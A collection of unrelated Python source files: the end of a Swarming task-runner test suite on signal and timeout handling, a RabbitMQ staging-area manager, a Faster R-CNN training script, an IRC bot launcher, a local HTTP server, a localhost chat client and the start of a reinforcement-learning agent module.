hard_timeout=True,
exit_code=exit_code,
output=(to_native_eol('hi\ngot signal %d\nbye\n') %
task_runner.SIG_BREAK_OR_TERM).encode())
@unittest.skipIf(sys.platform == 'win32',
'As run_isolated is killed, the children process leaks')
def test_io_signal_no_grace(self):
task_details = get_task_details(
self.SCRIPT_SIGNAL_HANG,
io_timeout=self.SHORT_TIME_OUT,
grace_period=self.SHORT_TIME_OUT)
exit_code = -1 if sys.platform == 'win32' else -signal.SIGKILL
expected = {
u'exit_code': exit_code,
u'hard_timeout': False,
u'io_timeout': True,
u'must_signal_internal_failure': None,
u'version': task_runner.OUT_VERSION,
}
self.assertEqual(expected, self._run_command(task_details))
# Now look at the updates sent by the bot as seen by the server.
# output_re='^hi\ngot signal %d\nbye\n$' % task_runner.SIG_BREAK_OR_TERM)
self.expectTask(
task_details.task_id,
io_timeout=True,
exit_code=exit_code,
output=(to_native_eol('hi\ngot signal %d\nbye\n') %
task_runner.SIG_BREAK_OR_TERM).encode())
def test_isolated_io_signal_grand_children(self):
"""Handles grand-children process hanging and signal management.
In this case, the I/O timeout is implemented by task_runner. The hard
timeout is implemented by run_isolated.
"""
files = {
'parent.py': (
b'import subprocess, sys\n'
b'print(\'parent\')\n'
b'p = subprocess.Popen([sys.executable, \'-u\', \'children.py\'])\n'
b'print(p.pid)\n'
b'p.wait()\n'
b'sys.exit(p.returncode)\n'),
'children.py': (b'import subprocess, sys\n'
b'print(\'children\')\n'
b'p = subprocess.Popen('
b'[sys.executable,\'-u\',\'grand_children.py\'])\n'
b'print(p.pid)\n'
b'p.wait()\n'
b'sys.exit(p.returncode)\n'),
'grand_children.py': self.SCRIPT_SIGNAL_HANG.encode(),
}
isolated = json.dumps({
'files': {
name: {
'h':
self.isolateserver.add_content_compressed(
'default-gzip', content),
's':
len(content),
} for name, content in files.items()
},
})
isolated_digest = self.isolateserver.add_content_compressed(
'default-gzip', isolated.encode())
manifest = get_manifest(
isolated={
'input': isolated_digest,
'namespace': 'default-gzip',
'server': self.isolateserver.url,
},
command=['python', '-u', 'parent.py'],
# TODO(maruel): A bit cheezy, we'd want the I/O timeout to be just
# enough to have the time for the PID to be printed but not more.
#
# This could be achieved by mocking time, and using a text file as a
# signal.
io_timeout=self.SHORT_TIME_OUT,
grace_period=60.)
expected = {
u'exit_code': EXIT_CODE_TERM,
u'hard_timeout': False,
u'io_timeout': True,
u'must_signal_internal_failure': None,
u'version': task_runner.OUT_VERSION,
}
try:
actual = load_and_run(self.server.url, self.work_dir, manifest, None)
finally:
# We need to catch the pid of the grand children to be able to kill it. We
# do so by processing stdout. Do not use expectTask() output, since it can
# throw.
output = self.getTaskResults(manifest['task_id'])['output']
for k in output.splitlines():
if not k.isdigit():
continue
pid = int(k)
try:
if sys.platform == 'win32':
# This effectively kills.
os.kill(pid, signal.SIGTERM)
else:
os.kill(pid, signal.SIGKILL)
except OSError:
pass
self.assertEqual(expected, actual)
# This is cheezy, this depends on the compiled isolated file.
if sys.platform == 'win32':
items_cold = u'eJybwMgW6w0AA/ABQA=='
else:
items_cold = u'eJybwMgW6wUAA+8BPw=='
self.expectTask(
manifest['task_id'],
io_timeout=True,
exit_code=EXIT_CODE_TERM,
output=re.compile(
to_native_eol('parent\n\\d+\nchildren\n\\d+\nhi\n').encode()),
isolated_stats={
u'download': {
u'duration': 0.,
u'initial_number_items': 0,
u'initial_size': 0,
u'items_cold': items_cold,
u'items_hot': u'',
},
u'upload': {
u'duration': 0.,
u'items_cold': u'',
u'items_hot': u'',
},
})
def test_kill_and_wait(self):
# Test the case where the script swallows the SIGTERM/SIGBREAK signal and
# hangs.
script = os.path.join(self.root_dir, 'ignore_sigterm.py')
with open(script, 'wb') as f:
# The warning signal is received as SIGTERM on posix and SIGBREAK on
# Windows.
sig = 'SIGBREAK' if sys.platform == 'win32' else 'SIGTERM'
f.write((('import signal, sys, time\n'
'def handler(_signum, _frame):\n'
' sys.stdout.write("got it\\n")\n'
'signal.signal(signal.%s, handler)\n'
'sys.stdout.write("ok\\n")\n'
'while True:\n'
' try:\n'
' time.sleep(0.01)\n'
' except IOError:\n'
' pass\n') % sig).encode())
cmd = [sys.executable, '-u', script]
# detached=True is required on Windows for SIGBREAK to propagate properly.
p = subprocess42.Popen(cmd, detached=True, stdout=subprocess42.PIPE)
# Wait for it to write 'ok', so we know it's handling signals. It's
# important because otherwise SIGTERM/SIGBREAK could be sent before the
# signal handler is installed, and this is not what we're testing here.
self.assertEqual(to_native_eol('ok\n').encode(), p.stdout.readline())
# Send a SIGTERM/SIGBREAK, the process ignores it, send a SIGKILL.
exit_code = task_runner.kill_and_wait(p, 1, 'testing purposes')
expected = 1 if sys.platform == 'win32' else -signal.SIGKILL
self.assertEqual(expected, exit_code)
self.assertEqual(to_native_eol('got it\n').encode(), p.stdout.readline())
def test_signal(self):
# Tests when task_runner gets a SIGTERM.
signal_file = os.path.join(self.work_dir, 'signal')
open(signal_file, 'wb').close()
# As done by bot_main.py.
manifest = get_manifest(
script='import os,time;os.remove(%r);time.sleep(60)' % signal_file,
hard_timeout=60.,
io_timeout=60.)
task_in_file = os.path.join(self.work_dir, 'task_runner_in.json')
task_result_file = os.path.join(self.work_dir, 'task_runner_out.json')
with open(task_in_file, 'w') as f:
json.dump(manifest, f)
bot = os.path.join(self.root_dir, 'swarming_bot.1.zip')
code, _ = swarmingserver_bot_fake.gen_zip(self.server.url)
with open(bot, 'wb') as f:
f.write(code)
cmd = [
sys.executable,
bot,
'task_runner',
'--swarming-server',
self.server.url,
'--in-file',
task_in_file,
'--out-file',
task_result_file,
'--cost-usd-hour',
'1',
# Include the time taken to poll the task in the cost.
'--start',
str(time.time()),
'--',
'--cache',
'isolated_cache_party',
] + DISABLE_CIPD_FOR_TESTS
logging.info('%s', cmd)
proc = subprocess42.Popen(cmd, cwd=self.root_dir, detached=True)
logging.info('Waiting for child process to be alive')
while os.path.isfile(signal_file):
time.sleep(0.01)
# Send SIGTERM to task_runner itself. Ensure the right thing happen.
# Note that on Windows, this is actually sending a SIGBREAK since there's no
# such thing as SIGTERM.
logging.info('Sending SIGTERM')
proc.send_signal(signal.SIGTERM)
proc.wait()
task_runner_log = os.path.join(self.logs_dir, 'task_runner.log')
with open(task_runner_log, 'rb') as f:
logging.info('task_runner.log:\n---\n%s---', f.read())
self.assertEqual([], self.server.get_bot_events())
expected = {
'swarming_bot.1.zip',
'7f03c894282e3fc39105466a8ee5055ffd05e79dfd4010360117078afbfa68bd'
'-cacert.'
'pem',
'w',
'isolated_cache_party',
'logs',
'c',
'cas-cache',
}
self.assertEqual(expected, set(os.listdir(self.root_dir)))
expected = {
u'hard_timeout': False,
u'id': u'localhost',
u'io_timeout': False,
u'task_id': manifest['task_id'],
}
actual = self.getTaskResults(manifest['task_id'])
self.assertLessEqual(0, actual.pop(u'cost_usd'))
self.assertEqual(expected, actual)
# TODO(sethkoehler): Set exit_code to 'exit_code' variable rather than None
# when we correctly pass exit_code on failure (see TODO in task_runner.py).
expected = {
u'exit_code': None,
u'hard_timeout': False,
u'io_timeout': False,
u'must_signal_internal_failure': u'',
u'version': 3,
}
with open(task_result_file, 'rb') as f:
self.assertEqual(expected, json.load(f))
self.assertEqual(0, proc.returncode)
# Also verify the correct error was posted.
errors = self.server.get_task_errors()
expected = {
manifest['task_id']: [{
u'message':
u'task_runner received signal %d' %
task_runner.SIG_BREAK_OR_TERM,
u'id':
u'localhost',
u'task_id':
manifest['task_id'],
}],
}
self.assertEqual(expected, errors)
class TaskRunnerNoServer(auto_stub.TestCase):
"""Test cases that do not talk to the server."""
def setUp(self):
super(TaskRunnerNoServer, self).setUp()
self.root_dir = six.ensure_text(tempfile.mkdtemp(prefix=u'task_runner'))
def tearDown(self):
try:
file_path.rmtree(self.root_dir)
except OSError:
print('Failed to delete %s' % self.root_dir, file=sys.stderr)
raise
finally:
super(TaskRunnerNoServer, self).tearDown()
def test_load_and_run_isolated(self):
self.mock(bot_auth, 'AuthSystem', FakeAuthSystem)
def _run_command(remote, task_details, work_dir, cost_usd_hour, start,
run_isolated_flags, bot_file, ctx_file):
self.assertTrue(remote.uses_auth) # mainly to avoid unused arg warning
self.assertTrue(isinstance(task_details, task_runner.TaskDetails))
# Necessary for OSX.
self.assertEqual(
os.path.realpath(self.root_dir), os.path.realpath(work_dir))
self.assertEqual(3600., cost_usd_hour)
self.assertGreaterEqual(time.time(), start)
self.assertEqual(['--min-free-space', '1'] + DISABLE_CIPD_FOR_TESTS,
run_isolated_flags)
self.assertEqual(None, bot_file)
with open(ctx_file, 'r') as f:
self.assertIsNone(json.load(f).get('local_auth'))
return {
u'exit_code': 0,
u'hard_timeout': False,
u'io_timeout': False,
u'must_signal_internal_failure': None,
u'version': task_runner.OUT_VERSION,
}
self.mock(task_runner, 'run_command', _run_command)
manifest = get_manifest(
command=['hello.exe'],
env={'d': 'e'},
isolated={
'input': '123',
'server': 'http://localhost:1',
'namespace': 'default-gzip',
})
actual = load_and_run(
'http://localhost:1', self.root_dir, manifest,
'/path/to/auth-params-file')
expected = {
u'exit_code': 0,
u'hard_timeout': False,
u'io_timeout': False,
u'must_signal_internal_failure': None,
u'version': task_runner.OUT_VERSION,
}
self.assertEqual(expected, actual)
def test_load_and_run_raw(self):
local_auth_ctx = {
'accounts': [{
'id': 'a'
}, {
'id': 'b'
}],
'default_account_id': 'a',
'rpc_port': 123,
'secret': 'abcdef',
}
realm_ctx = {'name': 'test:realm'}
def _run_command(
remote, task_details, work_dir,
cost_usd_hour, start, run_isolated_flags, bot_file, ctx_file):
self.assertTrue(remote.uses_auth) # mainly to avoid "unused arg" warning
self.assertTrue(isinstance(task_details, task_runner.TaskDetails))
# Necessary for OSX.
self.assertEqual(
os.path.realpath(self.root_dir), os.path.realpath(work_dir))
self.assertEqual(3600., cost_usd_hour)
self.assertGreaterEqual(time.time(), start)
self.assertEqual(['--min-free-space', '1'] + DISABLE_CIPD_FOR_TESTS,
run_isolated_flags)
self.assertEqual(None, bot_file)
with open(ctx_file, 'r') as f:
ctx = json.load(f)
self.assertDictEqual(local_auth_ctx, ctx['local_auth'])
self.assertDictEqual(realm_ctx, ctx['realm'])
return {
u'exit_code': 1,
u'hard_timeout': False,
u'io_timeout': False,
u'must_signal_internal_failure': None,
u'version': task_runner.OUT_VERSION,
}
self.mock(task_runner, 'run_command', _run_command)
manifest = get_manifest(command=['a'])
FakeAuthSystem.local_auth_context = local_auth_ctx
task_details = get_task_details(realm={'name': 'test:realm'})
try:
self.mock(bot_auth, 'AuthSystem', FakeAuthSystem)
with mock.patch('%s.TaskDetails.load' % task_runner.__name__,
mock.Mock(return_value=task_details)):
actual = load_and_run('http://localhost:1', self.root_dir, manifest,
'/path/to/auth-params-file')
finally:
FakeAuthSystem.local_auth_context = None
expected = {
u'exit_code': 1,
u'hard_timeout': False,
u'io_timeout': False,
u'must_signal_internal_failure': None,
u'version': task_runner.OUT_VERSION,
}
self.assertEqual(expected, actual)
if __name__ == '__main__':
fix_encoding.fix_encoding()
if '-v' in sys.argv:
unittest.TestCase.maxDiff = None
logging_utils.prepare_logging(None)
logging_utils.set_console_level(logging.DEBUG if '-v' in sys
.argv else logging.CRITICAL + 1)
# Fix literal text expectation.
os.environ['LANG'] = 'en_US.UTF-8'
os.environ['LANGUAGE'] = 'en_US.UTF-8'
unittest.main()
|
stagingmanager.py | #!/usr/bin/env python
"""
Listens for messages from ingest to create a staging area, post back the credentials for uploading
files to the staging area
"""
from ingest.api.ingestapi import IngestApi
from ingest.api.stagingapi import StagingApi
__author__ = "jupp"
__license__ = "Apache 2.0"
__date__ = "15/09/2017"
import json
import logging
import os
import sys
import threading
import time
from optparse import OptionParser
from listener import Listener
DEFAULT_RABBIT_URL = os.path.expandvars(os.environ.get('RABBIT_URL', 'amqp://localhost:5672'))
class StagingManager:
def __init__(self):
log_format = ' %(asctime)s - %(name)s - %(levelname)s in %(filename)s:%(lineno)s %(funcName)s(): %(message)s'
logging.basicConfig(stream=sys.stdout, level=logging.INFO, format=log_format)
self.logger = logging.getLogger(__name__)
self.ingest_api = IngestApi()
self.staging_api = StagingApi()
def create_upload_area(self, body):
message = json.loads(body)
if "documentId" in message:
submission_id = message["documentId"]
submission_url = self.ingest_api.get_submission_url(submission_id)
uuid = self.ingest_api.get_object_uuid(submission_url)
self.logger.info("Creating upload area for submission " + uuid)
upload_area_credentials = self.staging_api.createStagingArea(uuid)
self.logger.info(
"Upload area created! patching creds to subs envelope " + json.dumps(upload_area_credentials))
self.ingest_api.update_staging_details(submission_url, uuid, upload_area_credentials["uri"])
def delete_upload_area(self, body):
message = json.loads(body)
if "documentId" in message:
submission_id = message["documentId"]
submission_url = self.ingest_api.get_submission_url(submission_id)
submission_uuid = self.ingest_api.get_object_uuid(submission_url)
self.logger.info("Trying to delete the upload area for submission_uuid: " + submission_uuid)
if self.staging_api.hasStagingArea(submission_uuid):
self.staging_api.deleteStagingArea(submission_uuid)
self.logger.info("Upload area deleted!")
self.set_submission_to_complete(submission_id)
else:
self.logger.error("There is no upload area found.")
def set_submission_to_complete(self, submission_id):
for i in range(1, 5):
try:
self.ingest_api.update_submission_state(submission_id, 'complete')
self.logger.info('Submission status is set to COMPLETE')
except Exception:
self.logger.info("failed to set state of submission {0} to Complete, retrying...".format(submission_id))
time.sleep(1)
if __name__ == '__main__':
log_format = ' %(asctime)s - %(name)s - %(levelname)s in %(filename)s:%(lineno)s %(funcName)s(): %(message)s'
logging.basicConfig(stream=sys.stdout, level=logging.INFO, format=log_format)
parser = OptionParser()
parser.add_option("-q", "--queue", help="name of the ingest queues to listen for submission")
parser.add_option("-r", "--rabbit", help="the URL to the Rabbit MQ messaging server")
parser.add_option("-l", "--log", help="the logging level", default='INFO')
(options, args) = parser.parse_args()
staging_manager = StagingManager()
# start a listener for creating new upload are
create_listener = Listener({
'rabbit': DEFAULT_RABBIT_URL,
'on_message_callback': staging_manager.create_upload_area,
'exchange': 'ingest.upload.area.exchange',
'exchange_type': 'topic',
'queue': 'ingest.upload.area.create.queue',
'routing_key': 'ingest.upload.area.create'
})
t = threading.Thread(target=create_listener.run)
t.start()
# start a listener for deleting upload area
delete_listener = Listener({
'rabbit': DEFAULT_RABBIT_URL,
'on_message_callback': staging_manager.delete_upload_area,
'exchange': 'ingest.upload.area.exchange',
'exchange_type': 'topic',
'queue': 'ingest.upload.area.cleanup.queue',
'routing_key': 'ingest.upload.area.cleanup'
})
t = threading.Thread(target=delete_listener.run)
t.start()
|
train_faster_rcnn_alt_opt.py | #!/usr/bin/env python
# --------------------------------------------------------
# Faster R-CNN
# Copyright (c) 2015 Microsoft
# Licensed under The MIT License [see LICENSE for details]
# Written by Ross Girshick
# --------------------------------------------------------
"""Train a Faster R-CNN network using alternating optimization.
This tool implements the alternating optimization algorithm described in our
NIPS 2015 paper ("Faster R-CNN: Towards Real-time Object Detection with Region
Proposal Networks." Shaoqing Ren, Kaiming He, Ross Girshick, Jian Sun.)
"""
import _init_paths
from fast_rcnn.train import get_training_roidb, train_net
from fast_rcnn.config import cfg, cfg_from_file, cfg_from_list, get_output_dir
from datasets.factory import get_imdb
from rpn.generate import imdb_proposals
import argparse
import pprint
import numpy as np
import sys, os
import multiprocessing as mp
import cPickle
import shutil
def parse_args():
"""
Parse input arguments
"""
parser = argparse.ArgumentParser(description='Train a Faster R-CNN network')
parser.add_argument('--gpu', dest='gpu_id',
help='GPU device id to use [0]',
default=0, type=int)
parser.add_argument('--net_name', dest='net_name',
help='network name (e.g., "ZF")',
default=None, type=str)
parser.add_argument('--weights', dest='pretrained_model',
help='initialize with pretrained model weights',
default=None, type=str)
parser.add_argument('--cfg', dest='cfg_file',
help='optional config file',
default=None, type=str)
parser.add_argument('--imdb', dest='imdb_name',
help='dataset to train on',
default='voc_2017_trainval', type=str)
parser.add_argument('--set', dest='set_cfgs',
help='set config keys', default=None,
nargs=argparse.REMAINDER)
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
return args
def get_roidb(imdb_name, rpn_file=None):
imdb = get_imdb(imdb_name)
print 'Loaded dataset `{:s}` for training'.format(imdb.name)
imdb.set_proposal_method(cfg.TRAIN.PROPOSAL_METHOD)
print 'Set proposal method: {:s}'.format(cfg.TRAIN.PROPOSAL_METHOD)
if rpn_file is not None:
imdb.config['rpn_file'] = rpn_file
roidb = get_training_roidb(imdb)
return roidb, imdb
def get_solvers(net_name):
# Faster R-CNN Alternating Optimization
n = 'faster_rcnn_alt_opt'
# Solver for each training stage
solvers = [[net_name, n, 'stage1_rpn_solver60k80k.pt'],
[net_name, n, 'stage1_fast_rcnn_solver30k40k.pt'],
[net_name, n, 'stage2_rpn_solver60k80k.pt'],
[net_name, n, 'stage2_fast_rcnn_solver30k40k.pt']]
solvers = [os.path.join(cfg.MODELS_DIR, *s) for s in solvers]
# Iterations for each training stage
max_iters = [80000, 40000, 80000, 40000]
# max_iters = [100, 100, 100, 100]
# Test prototxt for the RPN
rpn_test_prototxt = os.path.join(
cfg.MODELS_DIR, net_name, n, 'rpn_test.pt')
return solvers, max_iters, rpn_test_prototxt
# ------------------------------------------------------------------------------
# Pycaffe doesn't reliably free GPU memory when instantiated nets are discarded
# (e.g. "del net" in Python code). To work around this issue, each training
# stage is executed in a separate process using multiprocessing.Process.
# ------------------------------------------------------------------------------
def _init_caffe(cfg):
"""Initialize pycaffe in a training process.
"""
import caffe
# fix the random seeds (numpy and caffe) for reproducibility
np.random.seed(cfg.RNG_SEED)
caffe.set_random_seed(cfg.RNG_SEED)
# set up caffe
caffe.set_mode_gpu()
caffe.set_device(cfg.GPU_ID)
def train_rpn(queue=None, imdb_name=None, init_model=None, solver=None,
max_iters=None, cfg=None):
"""Train a Region Proposal Network in a separate training process.
"""
# Not using any proposals, just ground-truth boxes
cfg.TRAIN.HAS_RPN = True
cfg.TRAIN.BBOX_REG = False # applies only to Fast R-CNN bbox regression
cfg.TRAIN.PROPOSAL_METHOD = 'gt'
cfg.TRAIN.IMS_PER_BATCH = 1
print 'Init model: {}'.format(init_model)
print('Using config:')
pprint.pprint(cfg)
import caffe
_init_caffe(cfg)
roidb, imdb = get_roidb(imdb_name)
print 'roidb len: {}'.format(len(roidb))
output_dir = get_output_dir(imdb)
print 'Output will be saved to `{:s}`'.format(output_dir)
model_paths = train_net(solver, roidb, output_dir,
pretrained_model=init_model,
max_iters=max_iters)
# Cleanup all but the final model
for i in model_paths[:-1]:
os.remove(i)
rpn_model_path = model_paths[-1]
# Send final model path through the multiprocessing queue
queue.put({'model_path': rpn_model_path})
def rpn_generate(queue=None, imdb_name=None, rpn_model_path=None, cfg=None,
rpn_test_prototxt=None):
"""Use a trained RPN to generate proposals.
"""
cfg.TEST.RPN_PRE_NMS_TOP_N = -1 # no pre NMS filtering
cfg.TEST.RPN_POST_NMS_TOP_N = 2000 # limit top boxes after NMS
print 'RPN model: {}'.format(rpn_model_path)
print('Using config:')
pprint.pprint(cfg)
import caffe
_init_caffe(cfg)
# NOTE: the matlab implementation computes proposals on flipped images, too.
# We compute them on the image once and then flip the already computed
# proposals. This might cause a minor loss in mAP (less proposal jittering).
imdb = get_imdb(imdb_name)
print 'Loaded dataset `{:s}` for proposal generation'.format(imdb.name)
# Load RPN and configure output directory
rpn_net = caffe.Net(rpn_test_prototxt, rpn_model_path, caffe.TEST)
output_dir = get_output_dir(imdb)
print 'Output will be saved to `{:s}`'.format(output_dir)
# Generate proposals on the imdb
rpn_proposals = imdb_proposals(rpn_net, imdb)
# Write proposals to disk and send the proposal file path through the
# multiprocessing queue
rpn_net_name = os.path.splitext(os.path.basename(rpn_model_path))[0]
rpn_proposals_path = os.path.join(
output_dir, rpn_net_name + '_proposals.pkl')
with open(rpn_proposals_path, 'wb') as f:
cPickle.dump(rpn_proposals, f, cPickle.HIGHEST_PROTOCOL)
print 'Wrote RPN proposals to {}'.format(rpn_proposals_path)
queue.put({'proposal_path': rpn_proposals_path})
def train_fast_rcnn(queue=None, imdb_name=None, init_model=None, solver=None,
max_iters=None, cfg=None, rpn_file=None):
"""Train a Fast R-CNN using proposals generated by an RPN.
"""
cfg.TRAIN.HAS_RPN = False # not generating prosals on-the-fly
cfg.TRAIN.PROPOSAL_METHOD = 'rpn' # use pre-computed RPN proposals instead
cfg.TRAIN.IMS_PER_BATCH = 2
print 'Init model: {}'.format(init_model)
print 'RPN proposals: {}'.format(rpn_file)
print('Using config:')
pprint.pprint(cfg)
import caffe
_init_caffe(cfg)
roidb, imdb = get_roidb(imdb_name, rpn_file=rpn_file)
output_dir = get_output_dir(imdb)
print 'Output will be saved to `{:s}`'.format(output_dir)
# Train Fast R-CNN
model_paths = train_net(solver, roidb, output_dir,
pretrained_model=init_model,
max_iters=max_iters)
# Cleanup all but the final model
for i in model_paths[:-1]:
os.remove(i)
fast_rcnn_model_path = model_paths[-1]
# Send Fast R-CNN model path over the multiprocessing queue
queue.put({'model_path': fast_rcnn_model_path})
if __name__ == '__main__':
args = parse_args()
print('Called with args:')
print(args)
if args.cfg_file is not None:
cfg_from_file(args.cfg_file)
if args.set_cfgs is not None:
cfg_from_list(args.set_cfgs)
cfg.GPU_ID = args.gpu_id
# --------------------------------------------------------------------------
# Pycaffe doesn't reliably free GPU memory when instantiated nets are
# discarded (e.g. "del net" in Python code). To work around this issue, each
# training stage is executed in a separate process using
# multiprocessing.Process.
# --------------------------------------------------------------------------
# queue for communicated results between processes
mp_queue = mp.Queue()
# solves, iters, etc. for each training stage
solvers, max_iters, rpn_test_prototxt = get_solvers(args.net_name)
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
print 'Stage 1 RPN, init from ImageNet model'
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
cfg.TRAIN.SNAPSHOT_INFIX = 'stage1'
mp_kwargs = dict(
queue=mp_queue,
imdb_name=args.imdb_name,
init_model=args.pretrained_model,
solver=solvers[0],
max_iters=max_iters[0],
cfg=cfg)
p = mp.Process(target=train_rpn, kwargs=mp_kwargs)
p.start()
rpn_stage1_out = mp_queue.get()
p.join()
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
print 'Stage 1 RPN, generate proposals'
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
mp_kwargs = dict(
queue=mp_queue,
imdb_name=args.imdb_name,
rpn_model_path=str(rpn_stage1_out['model_path']),
cfg=cfg,
rpn_test_prototxt=rpn_test_prototxt)
p = mp.Process(target=rpn_generate, kwargs=mp_kwargs)
p.start()
rpn_stage1_out['proposal_path'] = mp_queue.get()['proposal_path']
p.join()
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
print 'Stage 1 Fast R-CNN using RPN proposals, init from ImageNet model'
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
cfg.TRAIN.SNAPSHOT_INFIX = 'stage1'
mp_kwargs = dict(
queue=mp_queue,
imdb_name=args.imdb_name,
init_model=args.pretrained_model,
solver=solvers[1],
max_iters=max_iters[1],
cfg=cfg,
rpn_file=rpn_stage1_out['proposal_path'])
p = mp.Process(target=train_fast_rcnn, kwargs=mp_kwargs)
p.start()
fast_rcnn_stage1_out = mp_queue.get()
p.join()
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
print 'Stage 2 RPN, init from stage 1 Fast R-CNN model'
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
cfg.TRAIN.SNAPSHOT_INFIX = 'stage2'
mp_kwargs = dict(
queue=mp_queue,
imdb_name=args.imdb_name,
init_model=str(fast_rcnn_stage1_out['model_path']),
solver=solvers[2],
max_iters=max_iters[2],
cfg=cfg)
p = mp.Process(target=train_rpn, kwargs=mp_kwargs)
p.start()
rpn_stage2_out = mp_queue.get()
p.join()
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
print 'Stage 2 RPN, generate proposals'
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
mp_kwargs = dict(
queue=mp_queue,
imdb_name=args.imdb_name,
rpn_model_path=str(rpn_stage2_out['model_path']),
cfg=cfg,
rpn_test_prototxt=rpn_test_prototxt)
p = mp.Process(target=rpn_generate, kwargs=mp_kwargs)
p.start()
rpn_stage2_out['proposal_path'] = mp_queue.get()['proposal_path']
p.join()
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
print 'Stage 2 Fast R-CNN, init from stage 2 RPN R-CNN model'
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
cfg.TRAIN.SNAPSHOT_INFIX = 'stage2'
mp_kwargs = dict(
queue=mp_queue,
imdb_name=args.imdb_name,
init_model=str(rpn_stage2_out['model_path']),
solver=solvers[3],
max_iters=max_iters[3],
cfg=cfg,
rpn_file=rpn_stage2_out['proposal_path'])
p = mp.Process(target=train_fast_rcnn, kwargs=mp_kwargs)
p.start()
fast_rcnn_stage2_out = mp_queue.get()
p.join()
# Create final model (just a copy of the last stage)
final_path = os.path.join(
os.path.dirname(fast_rcnn_stage2_out['model_path']),
args.net_name + '_faster_rcnn_final.caffemodel')
print 'cp {} -> {}'.format(
fast_rcnn_stage2_out['model_path'], final_path)
shutil.copy(fast_rcnn_stage2_out['model_path'], final_path)
print 'Final model: {}'.format(final_path)
|
__init__.py | #!/usr/bin/env python
import sys, os, time, threading, signal
import bot
class Watcher(object):
# Cf. http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/496735
def __init__(self):
self.child = os.fork()
if self.child != 0:
self.watch()
def watch(self):
try: os.wait()
except KeyboardInterrupt:
self.kill()
sys.exit()
def kill(self):
try: os.kill(self.child, signal.SIGKILL)
except OSError: pass
def run_phenny(config):
if hasattr(config, 'delay'):
delay = config.delay
else: delay = 20
def connect(config):
p = bot.Phenny(config)
p.run(config.host, config.port)
try: Watcher()
except Exception, e:
print >> sys.stderr, 'Warning:', e, '(in __init__.py)'
while True:
try: connect(config)
except KeyboardInterrupt:
sys.exit()
if not isinstance(delay, int):
break
warning = 'Warning: Disconnected. Reconnecting in %s seconds...' % delay
print >> sys.stderr, warning
time.sleep(delay)
def run(config):
t = threading.Thread(target=run_phenny, args=(config,))
if hasattr(t, 'run'):
t.run()
else: t.start()
if __name__ == '__main__':
print __doc__
|
server.py | import sys
import threading
import time
import webbrowser
from BaseHTTPServer import HTTPServer
from SimpleHTTPServer import SimpleHTTPRequestHandler
class Server:
def __init__(self, port=8000):
self._initserver(port)
def openbrowser(self, url):
webbrowser.open_new_tab(url)
self.exitserver()
def exitserver(self):
q = str(raw_input('Hit Q to exit server.\n'))
while q != 'q':
q = str(raw_input())
print ('Shutting down server at port', self.PORT)
self.httpd.shutdown()
sys.exit(0)
def _initserver(self, port):
self.PORT = 8000
self.httpd = HTTPServer(('localhost', self.PORT), SimpleHTTPRequestHandler)
print ('Serving at port', self.PORT)
self.th = threading.Thread(target=self.httpd.serve_forever)
self.th.daemon = True
self.th.start()
time.sleep(5) |
client.py | import threading
import socket
# Choosing Nickname
nickname = input("Escolha o seu nickname: ")
# Connecting To Server
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect(('127.0.0.1', 55555))
# Receiving / Listening Function
# Listening to Server and Sending Nickname
def receive():
while True:
try:
# Receive Message From Server
# If 'NICK' Send Nickname
message = client.recv(1024).decode('ascii')
if message == 'NICK':
client.send(nickname.encode('ascii'))
else:
print(message)
except:
# Close Connection When Error
print("Ocorreu um erro!")
client.close()
break
# Sending Messages To Server
def write():
while True:
message = '{}: {}'.format(nickname, input(''))
client.send(message.encode('ascii'))
# Starting Threads For Listening And Writing
receive_thread = threading.Thread(target=receive)
receive_thread.start()
write_thread = threading.Thread(target=write)
write_thread.start()
|
agent.py | from __future__ import print_function
import multiprocessing
import os
import portalocker
import time
import traceback
from builtins import object
from builtins import range
from builtins import zip
import envwrap
import numpy as np
import tensorflow as tf
import valuerl
from config import config
import util
# Copyright 2018 The TensorFlow Authors All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
def run_env(pipe):
env = envwrap.get_env(config["env"]["name"])
reset = True
while True:
if reset is True: pipe.send(env.reset())
action = pipe.recv()
obs, reward, done, reset = env.step(action)
pipe.send((obs, reward, done, reset))
class AgentManager(object):
"""
Interact with the environment according to the learned policy,
"""
def __init__(self, proc_num, evaluation, policy_lock, batch_size, config):
self.evaluation = evaluation
self.policy_lock = policy_lock
self.batch_size = batch_size
self.config = config
self.log_path = util.create_directory("%s/%s/%s/%s" % (config["output_root"], config["env"]["name"], config["name"], config["log_path"])) + "/%s" % config["name"]
self.load_path = util.create_directory("%s/%s/%s/%s" % (config["output_root"], config["env"]["name"], config["name"], config["save_model_path"]))
## placeholders for intermediate states (basis for rollout)
